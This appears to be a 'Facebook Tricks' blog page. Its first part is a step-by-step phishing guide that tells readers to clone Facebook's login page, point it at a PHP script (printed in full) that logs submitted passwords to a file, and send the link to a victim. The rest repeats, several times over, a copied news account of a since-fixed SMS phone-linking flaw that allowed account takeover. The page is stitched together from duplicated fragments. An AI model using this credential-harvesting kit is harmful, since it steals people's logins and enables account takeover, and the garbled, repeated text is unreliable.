Facebook Tricks

1.Facebook Hacking Through Phishing


Hi Friend Today I Will Show You How To Hack Facebook Account Of Anyones Through Phishing Tricks.Now Follow These Steps To Hack Facebok Account By Creating Fake Login Page


Phishing Is The Easiest Method To Hack Facebook Account Even By This Method U Can Hack Any Email Account Also.To Know How To Hack FB Using Phishing Just Follow The Steps-

step1: go to www.facebook.com

step2: right click on white space and select the "View page source"

step3: copy the code to notepad

step4: now press Ctrl + F and write "action" and hit "Find next"

step5: u will get action="https://www.facebook.com/login.php?login_attempt=1" and edit this to action="hack.php" and save the document as index.html

step6: now copy the following code and save it as hack.php

<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

step7: now create a notepad file as pswrd.txt and there should not be any contents

step8: now u have 3 file index.html , hack.php & pswrd.txt.Now upload all the three files in any free webhosting

step9: copy the url of index.html and send to the victim.When victim login to his account, his password will be sent to the file "pswrd.txt"
2.Hacking Facebook Account With Just A Text Message.
 
Hacking Facebook Account with just a text message Can you ever imagine that a single text message is enough to hack any Facebook account without user interaction or without using any other malicious stuff like Trojans, phishing, keylogger etc. ? Today we are going to explain you that how a UK based Security Researcher, "fin1te" is able to hack any Facebook account within a minute by doing one SMS. Because 90% of us are Facebook user too, so we know that there is an option of linking your mobile number with your account, which allows you to receive Facebook account updates via SMS directly to your mobile and also you can login into your account using that linked number rather than your email address or username. According to hacker, the loophole was in phone number linking process, or in technical terms, at file /ajax/settings/mobile/confirm_phone.php This particular webpage works in background when user submit his phone number and verification code, sent by Facebook to mobile. That submission form having two main parameters, one for verification code, and second is profile_id, which is the account to link the number to. Hacking Facebook Account with just a text message As attacker, follow these steps to execute hack: Change value of profile_id to the Victim's profile_id value by tampering the parameters. Send the letter F to 32665, which is Facebook’s SMS shortcode in the UK. You will receive an 8 character verification code back. facebook sms 3 1 Enter that code in the box or as confirmation_code parameter value and Submit the form. facebook sms 4 Facebook will accept that confirmation code and attacker's mobile number will be linked to victim's Facebook profile. In next step hacker just need to go to Forgot password option and initiate the password reset request against of victim's account.

Read more: http://thehackernews.com/2013/06/Hacking-Facebook-account-hack-tool.html#
we are going to explain you that how a UK based Security

Read more: http://thehackernews.com/2013/06/Hacking-Facebook-account-hack-tool.html
Can you ever imagine that a single text message is enough to hack any Facebook account without user interaction or without using any other malicious stuff like Trojans, phishing, keylogger etc. ? Today we are going to explain you that how a UK based Security Researcher, "fin1te" is able to hack any Facebook account within a minute by doing one SMS. Because 90% of us are Facebook user too, so we know that there is an option of linking your mobile number with your account, which allows you to receive Facebook account updates via SMS directly to your mobile and also you can login into your account using that linked number rather than your email address or username.

Read more: http://thehackernews.com/2013/06/Hacking-Facebook-account-hack-tool.html
Can you ever imagine that a single text message is enough to hack any Facebook account without user interaction or without using any other malicious stuff like Trojans, phishing, keylogger etc. ? Today we are going to explain you that how a UK based Security Researcher, "fin1te" is able to hack any Facebook account within a minute by doing one SMS. Because 90% of us are Facebook user too, so we know that there is an option of linking your mobile number with your account, which allows you to receive Facebook account updates via SMS directly to your mobile and also you can login into your account using that linked number rather than your email address or username. According to hacker, the loophole was in phone number linking process, or in technical terms, at file /ajax/settings/mobile/confirm_phone.php This particular webpage works in background when user submit his phone number and verification code, sent by Facebook to mobile. That submission form having two main parameters, one for verification code, and second is profile_id, which is the account to link the number to. Hacking Facebook Account with just a text message As attacker, follow these steps to execute hack: Change value of profile_id to the Victim's profile_id value by tampering the parameters. Send the letter F to 32665, which is Facebook’s SMS shortcode in the UK. You will receive an 8 character verification code back. facebook sms 3 1 Enter that code in the box or as confirmation_code parameter value and Submit the form. facebook sms 4 Facebook will accept that confirmation code and attacker's mobile number will be linked to victim's Facebook profile. In next step hacker just need to go to Forgot password option and initiate the password reset request against of victim's account.

Read more: http://thehackernews.com/2013/06/Hacking-Facebook-account-hack-tool.html
Can you ever imagine that a single text message is enough to hack any Facebook account without user interaction or without using any other malicious stuff like Trojans, phishing, keylogger etc. ? Today we are going to explain you that how a UK based Security Researcher, "fin1te" is able to hack any Facebook account within a minute by doing one SMS. Because 90% of us are Facebook user too, so we know that there is an option of linking your mobile number with your account, which allows you to receive Facebook account updates via SMS directly to your mobile and also you can login into your account using that linked number rather than your email address or username.
 According to hacker, the loophole was in phone number linking process, or in technical terms, at file /ajax/settings/mobile/confirm_phone.php This particular webpage works in background when user submit his phone number and verification code, sent by Facebook to mobile. That submission form having two main parameters, one for verification code, and second is profile_id, which is the account to link the number to.
 
 
 
 Hacking Facebook Account with just a text message
 As attacker, follow these steps to execute hack: 
Change value of profile_id to the Victim's profile_id value by tampering the parameters. Send the letter F to 32665, which is Facebook’s SMS shortcode in the UK. You will receive an 8 character verification code back.
 
 
 Enter that code in the box or as confirmation_code parameter value and Submit the form.
 
 
 
  Facebook will accept that confirmation code and attacker's mobile number will be linked to victim's Facebook profile. In next step hacker just need to go to Forgot password option and initiate the password reset request against of victim's account. Attacker now can get password recovery code to his own mobile number which is linked to victim's account using above steps. Enter the code and Reset the password! Facebook no longer accepting the profile_id parameter from the user end after receiving the bug report from the hacker.